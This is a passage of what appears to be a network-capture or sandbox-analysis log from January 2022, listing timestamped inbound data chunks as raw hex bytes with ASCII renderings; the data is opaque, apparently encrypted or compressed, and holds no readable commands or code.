                                                                                                                                  2022-01-11 22:39:11 UTC5990INData Raw: 45 f5 69 52 76 af fc 0b fb ec 0a af 61 d1 48 6b c6 27 a8 45 95 16 51 1e 6c e6 60 10 0b d5 36 28 67 40 1f cb e4 c7 af 7f 69 af 8d 26 ca 4f 5f 6e e8 44 bd ff bd 1a a2 b7 f8 6a 73 1a 63 a4 3b 9f aa fc 46 5a a1 ca ed 6a 03 57 d5 82 61 f3 07 c4 e5 8f 80 78 ab 17 2c 81 ef 11 9d db d3 18 8e 93 06 6a b9 87 80 7c f6 da e0 d6 76 af 05 ce c4 21 b2 ee 2e 4e ed 82 78 4e cb ac 0f 40 8c 38 22 3e 4b 28 2d 21 10 76 f5 54 48 29 52 f1 67 63 4d 5d 3d 14 7e 7f 80 7d 25 92 18 a3 06 0c 97 74 a6 56 b1 c2 c0 21 0b af 52 53 93 7e 70 6c 95 02 53 06 e7 41 f2 88 4c 16 8a a9 01 4f e9 f6 1a a2 48 df 46 4d 41 b4 5d d6 67 5c ad a9 85 7d 38 9f 9e 6b b3 3f dd fb bf 50 ac 03 33 ff b3 a0 c4 66 2f b5 55 cf 69 19 1b 5f 8f 76 25 f0 a4 76 d9 11 08 e6 cd 4d a7 85 c4 3d 9e d4 68 1a 9d 0d 51 f6 f8
                                                                                                                                  Data Ascii: EiRvaHk'EQl`6(g@i&O_nDjsc;FZjWax,j|v!.NxN@8">K(-!vTH)RgcM]=~}%tV!RS~plSALOHFMA]g\}8k?P3f/Ui_v%vM=hQ
                                                                                                                                  2022-01-11 22:39:11 UTC6006INData Raw: 7e 06 26 74 b1 23 42 b5 dc e6 2c 21 92 bd e0 91 d4 1c 5b 12 a1 77 2a 35 9d b2 bc da 8d 31 e6 44 fa 50 1c 91 6c b2 c4 9b 3a 2d b7 79 d4 70 fa a4 27 5e 2f 9a 22 19 c0 30 79 f2 83 12 e9 5c 73 f2 e6 a8 79 d0 27 65 96 bf 87 71 4a 5e 9c 17 b4 e3 3a b1 40 ec 86 94 4a 23 09 bf 75 2a b6 bb 1b 21 9f d1 2d bf 48 ca 75 2d ec c2 8c 3d ff 29 11 44 39 e8 dc 2a 30 7b ab 2a 7f ca b9 cb c6 dd 8c 50 66 6f 89 d0 23 70 72 13 b3 fc 40 f7 ce 2c a8 a5 ec 8c 73 28 35 f9 77 76 85 29 24 ec 4c 12 99 67 9a 69 f9 83 02 fb 03 dc f5 db 3e d0 65 a6 d5 fe 94 8f 2b 4e 79 20 2d bb 76 a5 b4 cb 9b 96 2a 8e 48 ac df 8f 4c a5 2b c2 64 01 ea de 9e 3b 20 78 1f ed 81 61 c5 b4 d8 98 e0 e6 42 46 3d 0e 1d f7 59 44 85 3f bf b4 fb 9d 53 f1 b0 42 73 79 c6 e5 be cf 9a 66 f9 69 0e bf 75 8d c4 4f 2a e2 2d
                                                                                                                                  Data Ascii: ~&t#B,![w*51DPl:-yp'^/"0y\sy'eqJ^:@J#u*!-Hu-=)D9*0{*Pfo#pr@,s(5wv)$Lgi>e+Ny -v*HL+d; xaBF=YD?SBsyfiuO*-
                                                                                                                                  2022-01-11 22:39:11 UTC6022INData Raw: 1f b1 e6 2f db fc 63 4f f6 f1 b8 ae db 7d 82 08 b0 eb be 61 78 93 9f 7d b9 0c e2 cc da 92 df b6 15 79 14 b3 1f 83 ad 6c d9 d5 37 d8 f6 92 e8 b4 b2 d9 5e a2 e6 2d 59 2f 9c dd 69 bd 85 06 a3 86 eb 65 e6 d3 48 a5 e1 50 3c 73 9f a0 d9 b6 1c f9 e1 06 a7 58 2c fe 13 0c a9 4a ba 7e 0b 49 9e 49 f6 e2 a6 d3 88 58 72 88 7a 92 2c df 07 d7 0f 41 03 11 fb 85 b6 75 99 f5 8c 03 e2 f3 0c dc fd 78 53 0a 1a 4e af 0a 47 55 84 4b 96 20 85 e2 0b ff 6f a0 fd 48 57 6d 12 f7 18 33 0f 8b 23 5d 81 6e fd f6 ae 4d 00 c8 a4 2a a2 bc 6d 23 ac ca 7e 11 d1 5c dd af 69 c1 18 76 c2 0e 55 f9 07 81 69 a0 34 d8 1a a5 72 b3 17 32 e9 b6 37 03 c6 d2 19 78 3b 8d 3f 5f ba f5 d1 13 6d 66 9a 4d 84 3f ad fb fe 67 5f 12 2e 85 c3 13 fb 03 25 6d fe 9d e1 51 a5 fb a2 66 c2 e5 90 4e 94 7c 8e 0c 8b 76 9c
                                                                                                                                  Data Ascii: /cO}ax}yl7^-Y/ieHP<sX,J~IIXrz,AuxSNGUK oHWm3#]nM*m#~\ivUi4r27x;?_mfM?g_.%mQfN|v
                                                                                                                                  2022-01-11 22:39:11 UTC6038INData Raw: 9d 34 f8 a7 b0 85 66 8c 22 67 53 14 77 0b f7 0d b2 2f b0 43 ea bc 93 be 12 01 07 4f 5b ab 3b 9d 1f bf 60 1b d9 2a 31 cf 71 4d f9 29 c4 cd 31 c4 56 89 f9 aa e4 3e dd bc df ea 8b 5f 41 aa da 75 63 44 87 c8 43 a9 aa 53 2c 0b 9a 46 7f 9e 14 61 b6 24 70 e9 3d 02 1e e5 6e 53 cb 47 6a e0 95 3c 23 e4 ae a4 30 b5 04 00 65 8b 90 8e 7a 17 94 a3 8b 8a ac 05 d8 42 54 a6 c3 54 32 57 83 13 24 25 61 41 cc 7a f6 fa c8 2f 66 92 e0 8c 2c f1 38 25 e8 7d 3c e6 65 ec f7 a2 f1 9d 4e db 63 5b 5a cb e5 a4 e9 f0 f9 e8 bc cb b7 5e 61 6f 8b 57 b3 ef c8 a6 a3 8d 78 bf 8c ce 42 2b 14 f9 5a b8 84 b9 15 a4 be c2 bd 20 7a 0b 2f 6a 2a eb 26 e5 a7 ff c1 b7 61 67 c2 f9 95 02 b8 4e 93 c5 70 15 90 b3 a4 59 f2 6a 6a 99 f4 3d 2b 7a 5d 79 d4 2b a2 88 1a 12 e7 41 a2 68 61 02 be cb d7 e6 85 29 f4
                                                                                                                                  Data Ascii: 4f"gSw/CO[;`*1qM)1V>_AucDCS,Fa$p=nSGj<#0ezBTT2W$%aAz/f,8%}<eNc[Z^aoWxB+Z z/j*&agNpYjj=+z]y+Aha)
                                                                                                                                  2022-01-11 22:39:11 UTC6054INData Raw: 1c 99 90 2c 12 07 ed 74 0c 14 35 c6 91 b7 d8 39 8c 61 46 14 09 1e 16 9b b9 09 3d 77 f1 01 f5 72 d6 58 5b bf 48 43 ca 60 e3 44 2f 78 c8 7a 66 d9 49 5f 1c cc f0 5e 88 0b 54 2e d5 80 0e f3 cd 7a ca 09 f9 ed e1 06 09 96 f8 b6 52 f0 1d a9 63 e0 96 60 ad 64 fa 51 8d f4 51 2b 37 ba e4 e4 16 89 bb 4a 69 c2 03 56 bb c8 d6 c9 9e 12 50 11 2d 6c 68 41 e5 6d ee 4c bf ce 3f 7e 58 13 ae 0d 1f 36 50 79 db 5e 9e 82 d7 d1 55 e7 52 70 d5 1a 8c 39 bf 38 7b 4a bd 56 a1 34 f0 c5 9e bb fc 4f 5b ca 41 fb 3e ce 7b 9e 35 ba 9f 39 b5 5b 68 9d f0 0b ac 08 d0 d7 73 9f 0b 01 1d 30 dc 56 22 97 19 2b ed c1 f8 39 01 a1 86 a9 d0 eb 07 a0 ee 5e b0 73 d0 a6 55 31 56 2f ee 28 4b d9 99 7f c3 89 08 03 72 08 0f 48 9b ec 76 9b 01 ad ad 71 ae b5 4a 03 dd ba d2 1e 48 75 9f a6 28 6e bf 9d 43 ab df
                                                                                                                                  Data Ascii: ,t59aF=wrX[HC`D/xzfI_^T.zRc`dQQ+7JiVP-lhAmL?~X6Py^URp98{JV4O[A>{59[hs0V"+9^sU1V/(KrHvqJHu(nC
                                                                                                                                  2022-01-11 22:39:11 UTC6070INData Raw: 5a 7a 40 1b 94 07 e9 9e 10 25 ab 67 44 4a 70 7f 15 b8 84 e8 f3 b6 50 94 e8 ba 86 3d 8d 8d 72 0c 77 8f b0 49 a9 36 8a 1c 83 2c 01 50 26 91 d5 bd ed d1 e3 45 b7 95 97 47 03 bc 3e 94 be d5 fb 63 d9 17 7c 11 d3 91 65 79 65 01 02 02 a5 c1 5e bd d6 da d6 07 87 29 a9 7e b6 36 24 49 c7 51 59 ab 34 35 e2 83 a5 3c 1d f6 a9 6d 3a 22 11 a3 10 27 87 46 6c 12 db 7b 9f 20 3d 39 1b 1d 3f c8 7e 47 c2 74 6f bb 97 05 05 e7 8f e3 b1 29 4b be bb 35 e1 ac 46 25 fa 41 74 dd d3 f2 33 4e 44 ea 19 ff e9 7c 51 df 69 73 85 00 b8 fb 6a cd c1 75 57 6c 2c 03 c4 96 d7 cc 57 54 50 33 ea 31 90 02 87 22 ef 7b 17 d3 93 b8 95 5f 6e 7b f7 40 d1 92 56 de b4 1c e3 28 16 7e 6c ae eb 2d a8 54 b2 fb 16 2e 59 c5 b9 ed 02 5b 6c 55 9e a8 07 67 bb aa 27 dd 75 83 ea f6 49 d5 34 2b 35 6f e4 31 da 81 9f
                                                                                                                                  Data Ascii: Zz@%gDJpP=rwI6,P&EG>c|eye^)~6$IQY45<m:"'Fl{ =9?~Gto)K5F%At3ND|QisjuWl,WTP31"{_n{@V(~l-T.Y[lUg'uI4+5o1
                                                                                                                                  2022-01-11 22:39:11 UTC6086INData Raw: 5f c9 09 83 1c 3a 86 ce 30 11 db 68 e2 5b dc e1 d0 5a d3 99 15 c3 12 fb 61 79 e0 19 ff f3 f6 c0 d6 05 6c c8 e9 d0 6c 2c 81 74 b1 e1 c7 91 1f d5 5e 7b af 2c ec ca 4b 50 be b3 78 c5 d3 0d f1 c2 f9 b5 f8 cf 98 70 0f 15 07 c8 e4 51 86 3a 63 76 40 4b 46 5a 51 00 8d 1a b5 02 ac 54 4b 1f 7b 07 d2 fd 40 9a b0 ec 23 7f dd fb aa c4 d5 e5 b3 4c 79 3d 22 e3 2f be 02 08 10 6c 6a 78 aa 99 82 3d 38 15 6d f0 8c 25 2e 97 f3 d3 9c ae bf 14 63 31 ad d9 dc 40 15 d2 5d 7c d1 1a 3d 3c 4c e0 01 08 41 8c ad c9 6f 29 df d0 97 73 28 ec 9a 4b a1 22 ec 74 da 2e 1f bf 45 32 db 42 c8 dd fb d7 2f 7a b8 85 25 95 0e 83 6b c2 05 0d d1 84 c3 53 4d d5 33 e5 47 ee 2c bb 4b fd e3 53 24 e5 c0 1b a7 b9 49 e7 22 dc 8c 3e b3 89 34 69 28 a5 c2 f6 d7 77 74 74 29 0b c8 7e 23 cc a4 25 a8 9b 18 e9 6e
                                                                                                                                  Data Ascii: _:0h[Zayll,t^{,KPxpQ:cv@KFZQTK{@#Ly="/ljx=8m%.c1@]|=<LAo)s(K"t.E2B/z%kSM3G,KS$I">4i(wtt)~#%n
                                                                                                                                  2022-01-11 22:39:11 UTC6102INData Raw: c1 bc 4e 20 4f 22 d9 f3 36 da 75 e3 f3 58 a0 62 62 6d 9c 85 39 5a 92 f6 c4 f4 0c 51 13 09 58 a0 d5 9d af 49 c0 92 d2 45 8e 21 4d 27 b9 e9 ec d6 f8 76 81 b0 37 d3 e1 2a 07 f7 6b c3 66 8c b3 54 60 58 b7 c0 81 e7 bf e0 05 fa fe d3 fe 7d 14 02 fe 0c 42 80 7d 72 37 c6 c1 b4 53 d3 79 9a 75 63 74 f9 a3 5b 99 7f d1 f4 f1 30 d5 a4 5d 27 a4 c4 8b 67 32 eb 46 e0 72 c8 be 24 37 7a e4 57 6d 63 25 60 62 d0 19 1c 2a f5 d0 1a d0 d9 ff 22 71 f6 60 cb 91 f6 97 86 cc 8b 9d c9 61 0b dc 7f 37 31 2c 46 ae e9 60 70 a1 d6 9f 44 30 ea a6 ed 5f 0d 79 44 ad b4 05 dc d8 37 36 be 7f e2 dd fb 81 41 c2 bb 2b 1e a3 2c ff 1f 00 df 28 09 fd f6 26 c1 6b 60 d5 13 40 7e 21 e9 09 4e 6b e1 20 fa b8 72 80 d1 3a d0 c2 99 d6 b6 a7 a0 2a 60 7a 2d f0 ec 23 64 d2 5a fd 9b 5b c7 a3 04 cd 45 84 35 7c
                                                                                                                                  Data Ascii: N O"6uXbbm9ZQXIE!M'v7*kfT`X}B}r7Syuct[0]'g2Fr$7zWmc%`b*"q`a71,F`pD0_yD76A+,(&k`@~!Nk r:*`z-#dZ[E5|
                                                                                                                                  2022-01-11 22:39:11 UTC6118INData Raw: f7 75 2b d3 b8 dc e7 74 a4 2e 03 be eb bf 03 0f 7e ef c9 14 c1 d1 58 53 12 a3 4e 7b 76 47 f7 fc 40 94 e8 62 04 a8 ce 1a 06 73 d0 89 23 a0 a7 22 bf 44 e9 65 a8 3d f9 2c 4a ff 0b be 31 9c 80 6e 78 80 d4 b9 83 9f ec 37 ac a6 f9 7f 9a 4d 7b 07 3d 8f 00 96 a0 08 d0 c5 96 0e 85 66 d7 8d 45 3e 17 0b d9 30 13 17 f0 4b 84 22 a3 4d 8e c0 04 ad 76 0c 4a 67 31 f2 58 8c 69 d9 f9 a7 b3 6b 40 b5 79 f0 32 3e 39 f6 24 00 cf b2 96 9c b4 e9 b2 67 a9 27 fa 39 83 7d 93 47 7e 18 ba b6 2a 1e 5a 5d db 9f 9e 80 f9 39 16 85 00 57 1c 37 d6 56 de ca 20 bc 5b c8 be e8 71 fb 0d 3e e1 9e 22 26 2c c1 07 9d 72 69 d3 8d d8 da ba 13 da 59 0c 0f 2a b6 8d a1 fe 4f fa be 75 58 2b 3a 34 b3 2f 2a 8d 66 d6 b3 42 41 a7 ed 45 82 4a 6e 33 c4 c7 3c 67 2d 37 4c 26 7e 7d 90 38 c0 5f 91 c0 d2 f9 6b bd
                                                                                                                                  Data Ascii: u+t.~XSN{vG@bs#"De=,J1nx7M{=fE>0K"MvJg1Xik@y2>9$g'9}G~*Z]9W7V [q>"&,riY*OuX+:4/*fBAEJn3<g-7L&~}8_k
                                                                                                                                  2022-01-11 22:39:11 UTC6134INData Raw: d0 5b ac da a6 20 1f 20 b0 42 e3 65 e9 44 67 72 97 d3 38 de 6f 41 1b ad 0e ed 1d be a4 af b6 0d 82 3a 9a b9 de 0f 15 52 74 03 68 f3 10 51 58 c9 f4 62 07 cb d7 25 d5 47 b6 fd 96 1d 90 c4 02 29 d1 8f 56 b1 91 5f c4 7c ae 01 39 fc 4c 6f f6 a4 72 ea 00 75 3b 84 8e 6a ae 12 7a 8f 70 63 36 ec 18 8b 8c f9 e7 df fb 6c a9 e2 ba 83 df 4d 91 24 0b 40 81 f8 3b b4 ca c3 90 76 98 ce 23 ce 40 88 d4 33 b7 8e 2f 6d 36 90 cb 64 bf 85 97 27 35 6c e2 52 d9 ef 30 fb 10 83 11 75 59 4b 8a 12 f6 b8 4d 89 bc 24 87 bb 91 33 3b 8f f3 e4 44 62 d6 f8 06 8f b9 a1 f3 6e ce 32 ae 47 01 7f fa 18 07 cb c1 25 ce a8 da 37 af 6b c1 a9 ba e4 b0 92 87 ce 0e 50 37 c3 39 3a 1b 14 3d 90 84 f8 af f1 db 83 06 3e 02 b5 e5 5b 71 62 e2 c9 de 4a 76 dd a5 2e 95 12 ff 94 53 bb 89 be 0e c3 c7 b0 26 c9 d9
                                                                                                                                  Data Ascii: [ BeDgr8oA:RthQXb%G)V_|9Loru;jzpc6lM$@;v#@3/m6d'5lR0uYKM$3;Dbn2G%7kP79:=>[qbJv.S&
                                                                                                                                  2022-01-11 22:39:11 UTC6150INData Raw: 73 33 b1 93 42 7b 4f 1a 20 27 2d f2 b3 e5 67 00 59 76 55 b5 5d a3 ed 0a 42 70 0a f2 d2 66 57 58 e1 4c dd a3 43 a6 0e 79 1a 5c 76 c2 bd fa 69 26 db 8a dd 87 65 27 3f 02 52 07 3c a1 27 8b 0d 99 25 12 47 0b 28 de 4c 8a 8d bb 4a 1c 80 4b 0e 92 9e f4 f2 b4 bc 95 29 51 e1 1c 39 ff bc 8d 4e 33 68 da 0a b6 67 b8 1d fc b3 cd a6 ed f9 87 9c b6 92 72 0a 17 1a ff 06 4b 62 c1 99 ca 1a 18 8d 7f 6d c5 70 40 49 d0 9d a6 70 87 af 9f 3c 6c 3a 3b f9 f6 52 cf 8b 9f a1 4f 23 82 3a 31 24 ff 62 d0 d4 69 b4 3a a0 d1 98 5a 31 6d 58 39 58 3a 80 9e ce 68 84 87 c0 b1 e6 cb ce d1 e5 e4 22 8d ef e8 e1 89 78 9b 77 9d cf b9 bd 27 f2 74 d4 c2 74 4c dc 33 2b 48 ea 3b 31 4d a7 0c f5 b2 05 91 1e 32 1b b4 5e 40 dd 4b 7d 64 bf c5 06 2e 0e 9a 0d 14 11 6e d9 ac 1d f3 50 b6 f3 93 8b 87 1a bd dc
                                                                                                                                  Data Ascii: s3B{O '-gYvU]BpfWXLCy\vi&e'?R<'%G(LJK)Q9N3hgrKbmp@Ip<l:;RO#:1$bi:Z1mX9X:h"xw'ttL3+H;1M2^@K}d.nP
                                                                                                                                  2022-01-11 22:39:11 UTC6166INData Raw: 41 1b 30 a3 3f 34 bd e5 86 d5 dc c9 24 6e 65 38 75 1e 67 32 3d c2 e2 90 13 86 b1 31 87 85 98 73 09 cc b1 6f ac 77 68 da 68 42 9c 20 c2 0a 28 d8 ef 40 c3 7e ca be 0c b6 97 57 f3 cb c7 44 00 77 34 e1 9c cb ba d5 69 be 9c be 7d d0 43 cc 7a 80 8c 72 23 04 7f 07 bd a9 8b 1f 4e b8 88 9b c0 9e a1 f1 9c 4d 55 e6 89 0e 6f 05 35 91 93 15 fe 41 48 f2 5a 58 8d f2 95 ec 7c c5 df 0c 67 5c a6 38 b9 03 ff 19 ca 57 40 e5 47 ad b7 87 50 61 11 70 72 6d 4a 1f 83 f3 3a 42 58 01 a9 0e f1 0c 18 9d fb 2c c2 6b 79 42 8d 34 5d 52 11 56 9d 47 6b c0 14 44 26 74 f4 f5 a8 38 70 7c 18 d1 4b e0 d8 b9 14 1a e1 76 b2 79 ef 55 77 14 31 01 1a bc 6a 9c 48 e7 86 2d 82 90 c2 19 46 f7 cd bd 05 d1 96 c3 54 36 95 3b f4 ff 1c a3 da fe 5a 89 9a 4c 64 16 2d a1 66 a2 7d f8 df 09 46 36 24 d3 ec 47 fe
                                                                                                                                  Data Ascii: A0?4$ne8ug2=1sowhhB (@~WDw4i}Czr#NMUo5AHZX|g\8W@GPaprmJ:BX,kyB4]RVGkD&t8p|KvyUw1jH-FT6;ZLd-f}F6$G
                                                                                                                                  2022-01-11 22:39:11 UTC6182INData Raw: 6c e4 53 d2 12 91 ae 2c c7 af 38 72 46 57 2b cd b4 7e c9 17 c4 43 0e 81 df 38 eb c1 61 86 61 c1 7b 3f 9f 50 fc 63 80 86 4e 05 d5 8f 49 cc a7 c9 0a 99 54 c7 7b ce 95 8a 53 c1 0c c7 c6 c3 43 a2 a6 bf 91 b8 56 e4 22 b9 02 b7 ea 7a d3 18 a1 26 d4 0e 66 4e cc 1d 53 65 98 e1 60 0e 79 a6 05 2a 5f b8 74 9b ac a6 2a f4 e0 8f 3c ec 1f 5a 3e bc 72 24 ec 2b 3b 0d d5 5e 49 52 30 05 91 9f c0 54 e0 b3 70 69 4b a4 0e dc 07 68 6f 33 33 2e d5 96 9f e3 3a b1 a1 be d3 55 28 96 03 27 63 26 71 32 40 6c b3 a2 73 c7 68 7e 73 e2 49 04 41 ce 68 4e 9a f3 a7 2d 5e ea 11 3d 20 6a bd 8f ed 9c 92 25 86 f2 c3 ce a6 96 b9 16 80 aa 90 55 89 92 13 3d 3a c7 da c6 ae e9 d0 bb 46 23 b4 1e 93 25 ab e1 b8 7b 14 7a 2e cd c0 88 a3 68 e6 fc 92 66 3e 63 d4 fb d8 6b 99 51 ea 36 13 c7 2d bd 40 d2 dc
                                                                                                                                  Data Ascii: lS,8rFW+~C8aa{?PcNIT{SCV"z&fNSe`y*_t*<Z>r$+;^IR0TpiKho33.:U('c&q2@lsh~sIAhN-^= j%U=:F#%{z.hf>ckQ6-@
                                                                                                                                  2022-01-11 22:39:11 UTC6198INData Raw: 88 d5 78 e6 24 71 a8 17 ba e1 47 d8 c3 0c 54 0c 23 5d cf 3c 7b 53 2c 44 e9 ac 9d 13 45 37 6b 6a fb dd 32 2e 7d 31 b1 9b 70 aa 81 3d 96 c5 50 a9 4e b8 d1 13 93 3e 41 dc 21 cf c4 d0 1c 52 d6 f3 8f a9 37 6a 93 c7 67 88 d3 43 bd 4e 67 01 ec 7a f5 54 14 4d 53 d2 d0 b5 2d 58 9a 0e ed 19 52 f8 8c 83 f5 bf f4 7d d5 f9 18 38 76 af 30 14 21 ec c7 4e ac 58 3a ba f8 a1 ea 16 c3 ae 2d a0 45 ae 40 16 57 e4 2c d0 21 e2 c2 38 1e b5 7e 5b 68 d7 1e a6 ca 82 6c c1 a8 ea 37 5c e9 d9 37 ca 6c 66 e5 66 51 3f 4c cc b5 d8 97 5a 47 00 ad 1d 48 76 23 f2 95 9a d3 00 c0 cf ea e4 61 4c 91 40 a0 48 fc 63 c8 28 19 29 22 16 9c 5c e9 14 2d d3 8d 63 97 a9 5f 8d e0 32 9a 73 56 5f ea 87 dc cc 49 88 ce 7f 91 9c 42 5e 97 3d 13 c2 47 3e 59 13 0f 59 fa 39 da 56 1b 9b 8e aa ce 11 f2 c0 ae af b2
                                                                                                                                  Data Ascii: x$qGT#]<{S,DE7kj2.}1p=PN>A!R7jgCNgzTMS-XR}8v0!NX:-E@W,!8~[hl7\7lffQ?LZGHv#aL@Hc()"\-c_2sV_IB^=G>YY9V
                                                                                                                                  2022-01-11 22:39:11 UTC6214INData Raw: c7 60 84 58 3c fd 15 9a 9c 9e 5a 87 5b 56 b2 44 06 47 29 cb f5 0a 7b d7 3b 42 23 7e c9 49 b6 d9 37 d0 f7 5e 09 db 71 f0 58 55 80 5f ec ed 21 90 18 42 c3 36 6e 2e c2 6b a4 0e 98 3b 1d 7d 37 91 8f c1 93 00 f3 0f c9 0b 63 53 99 23 38 1c 6a 22 64 7b 6a 8b ec 4b a3 4a 82 c2 b1 e3 0d c5 10 b7 4d 29 13 36 9a 64 a0 e4 e8 bb dc e9 66 3c e0 f7 a0 03 23 0e 2b f6 02 66 50 f8 44 5f f4 5d d3 40 7e eb 0f 08 80 c8 c7 40 fc f0 51 aa d4 03 42 fc c9 c4 5f 95 48 e8 b6 64 9c 8a 21 10 4b 56 48 34 62 1f 6c d1 cb 9f 4e 1a 8b cd 3b a3 3c 71 78 06 7d 2f d5 27 99 b1 3c ea cf cf 42 fe e2 72 f1 97 33 76 a3 c8 87 e5 28 c0 97 e0 2b 8a 68 49 b9 21 af 32 ea 58 cb 53 5d c3 a1 a9 2d 59 c7 b9 76 d8 be dd f6 89 47 b8 03 c1 81 f3 d4 75 76 db 12 22 3d 00 b8 89 a4 1d 19 ba 84 bd 17 6e 6f 30 07
                                                                                                                                  Data Ascii: `X<Z[VDG){;B#~I7^qXU_!B6n.k;}7cS#8j"d{jKJM)6df<#+fPD_]@~@QB_Hd!KVH4blN;<qx}/'<Br3v(+hI!2XS]-YvGuv"=no0
                                                                                                                                  2022-01-11 22:39:11 UTC6230INData Raw: c5 b2 22 88 33 9b 56 00 c3 37 81 b1 97 c1 30 c3 be 4a fe ea f2 78 2b 64 40 82 1f a8 e8 03 f2 a5 c3 86 9d 7d 62 63 ee ba 55 49 35 a4 2a 06 44 00 64 79 c4 2b f7 74 8c 12 29 42 16 4f d0 74 92 fa 91 97 fb 99 20 b9 42 78 46 d5 2d 93 1f 75 75 a9 e4 d9 59 39 77 7e 61 25 d2 e3 6e 3b cc 4c 90 02 f9 58 df 8b bd ad 31 d9 16 21 17 96 11 a3 8d a7 06 38 34 59 7d dc e6 9c 63 3b e4 71 50 98 0d d4 2c 96 80 cf 55 44 05 05 0f 1b 07 a2 5b 52 c1 49 9c c7 da 27 7d 58 c5 f5 66 23 e7 4d df f1 59 62 d0 68 0a 21 5e 53 0c a7 d2 36 fb 10 da 42 79 01 4b e3 7b be 09 fa 8f b7 db 7e 6f df f4 69 c1 a9 13 22 c8 c7 ae 87 aa 7d 3f 5b 8e 59 ec 19 01 d0 d4 65 bb 9c 20 93 a8 7c 8b 25 c2 17 20 9c 18 1c 63 9e a4 4f ed 9a 6e 00 4e 2e c1 31 ee ff 7e 57 ef c5 b9 96 d0 1f f3 63 d9 56 f9 80 53 1b 32
                                                                                                                                  Data Ascii: "3V70Jx+d@}bcUI5*Ddy+t)BOt BxF-uuY9w~a%n;LX1!84Y}c;qP,UD[RI'}Xf#MYbh!^S6ByK{~oi"}?[Ye |% cOnN.1~WcVS2
                                                                                                                                  2022-01-11 22:39:11 UTC6246INData Raw: e6 22 82 a1 fc fe 13 0c 70 89 14 3f 8e e8 46 99 25 95 dd 6f 61 60 68 ef f7 05 39 2c 8e 24 d1 8b b8 19 f7 1f ba 41 a0 55 15 60 41 a9 03 fc 65 f9 8d ef f1 5d 41 b9 d0 cc dd e5 3b ff fe 79 8a 1e fc 14 02 ad 32 c8 f9 52 cb 8b a9 3e f8 db 78 30 d1 5b 67 ef ec 3d 95 7d 2e d0 fd af 35 8a bf 28 23 37 42 7c db ef 16 1b 43 9f 8e d9 87 36 8e c5 cf 4e 5a 5c 8d 02 00 24 3b 36 c0 f9 2e 95 62 f9 b2 4d 94 81 33 67 a2 01 8f d9 5c 90 28 c0 2c 56 c7 37 6b 60 db f0 90 ea 8f 2b 29 1a 19 76 c0 b8 38 60 79 2e 42 80 5a b4 40 4c e0 8c 47 c5 7a 74 d6 6f 7c cc 0b 37 ca 10 a0 98 7f f0 d1 29 1f 7a 1a 6f db b0 ec 3b cb 9b ad 9b 3f e7 57 ad b2 46 2a 89 0c de a9 49 83 2d 2c 1a 91 2b 1f 5a 3d 13 92 2b 0e 12 f1 af 6c 9e d0 d4 ad f8 ea c6 6c c8 0b e7 3d 8f 56 cf d1 8e 5e 8e 45 bc f0 7f 0c
                                                                                                                                  Data Ascii: "p?F%oa`h9,$AU`Ae]A;y2R>x0[g=}.5(#7B|C6NZ\$;6.bM3g\(,V7k`+)v8`y.BZ@LGzto|7)zo;?WF*I-,+Z=+ll=V^E
                                                                                                                                  2022-01-11 22:39:11 UTC6262INData Raw: 2d 7d da 3f 1f 83 eb 55 87 6e 31 46 a7 6c 52 16 01 5c 37 42 af 96 da f3 c9 69 3f 1f e0 af 78 02 d5 72 db c8 b5 b3 ab 60 71 4c ec 27 ee d0 ef 21 4b 6c a0 cc 1f 9b 8e d0 2e 8b 88 09 2f 7e 51 ce 01 55 6d f8 37 95 27 2e 6b 10 e1 58 59 29 2c e7 75 74 e0 31 a5 67 75 f0 ec 1c f5 ed 76 0b f6 45 bb c3 cf 42 bf 89 9a 05 92 2c 70 9c cc 3c 1a 78 5f 20 5f 68 c1 c1 52 4e ee f8 59 10 04 f7 f8 d2 22 18 76 77 e3 e7 d7 1b 96 61 9a da 13 3f 46 8f 88 9c cc 5e a7 90 5e fd 15 2d 30 b2 83 32 69 4c 03 6b 88 1f 3d 9a 37 b5 5e 30 26 6e b2 04 68 ed f9 6d 93 d6 ee 56 11 7f af db 56 e7 d1 1e 5f 53 56 4f 3a d3 7b 24 59 42 e5 37 33 eb b8 98 6b 63 88 6b 85 bf 90 93 98 b2 84 69 16 36 dd ce b6 e2 74 52 b9 46 82 ca 8c 2b b8 4b 18 a4 e5 77 d3 ee 77 43 3a 96 eb 79 1c 35 e8 20 81 a0 d0 11 46
                                                                                                                                  Data Ascii: -}?Un1FlR\7Bi?xr`qL'!Kl./~QUm7'.kXY),ut1guvEB,p<x_ _hRNY"vwa?F^^-02iLk=7^0&nhmVV_SVO:{$YB73kcki6tRF+KwwC:y5 F
                                                                                                                                  2022-01-11 22:39:11 UTC6278INData Raw: df ed e0 23 30 b7 9c 94 1d 3d 36 61 11 fc ff fe 45 5e ec 60 aa 8e df 1a 01 2a 7f f3 32 64 ea 62 66 a0 ea 24 9b 3e be d4 81 f6 c2 0d 47 bc 32 8e 78 ff 64 9d f8 76 91 4e 42 41 91 f8 d3 93 59 a9 bd aa 43 95 8d 17 27 48 68 0a d2 0a 3b 3d 2f 29 c4 36 56 cc d0 98 10 59 57 1a 26 63 ca 4c c2 fc c5 25 fe b5 04 36 1b 56 13 83 27 6c 8d b4 a3 9f f8 26 3b 93 18 3d 9a 02 e5 da a1 0b e9 2e 54 fe 06 cd 03 58 44 09 08 f2 26 21 7f 76 35 e5 0e 88 2c 6e 58 82 e8 31 6a f2 80 ec 80 a3 87 0c 42 d7 8e c0 c4 71 bd c8 c3 21 cc 2c d1 1f 24 84 19 ce c7 33 09 c7 bc eb 04 4f 5c b5 ba b4 fd 3d 6a 3f af e0 83 5f a7 65 14 0a fe 5d 10 fa 17 ca 27 10 f5 f3 94 69 4d 79 1d e4 c4 63 35 0f 34 42 98 4f dd 55 b1 a7 db 15 12 6f e8 94 2f 5d 95 ca 46 5b 92 ab 08 dc a6 34 5b 3c ed f9 f0 29 a3 52 d3
                                                                                                                                  Data Ascii: #0=6aE^`*2dbf$>G2xdvNBAYC'Hh;=/)6VYW&cL%6V'l&;=.TXD&!v5,nX1jBq!,$3O\=j?_e]'iMyc54BOUo/]F[4[<)R
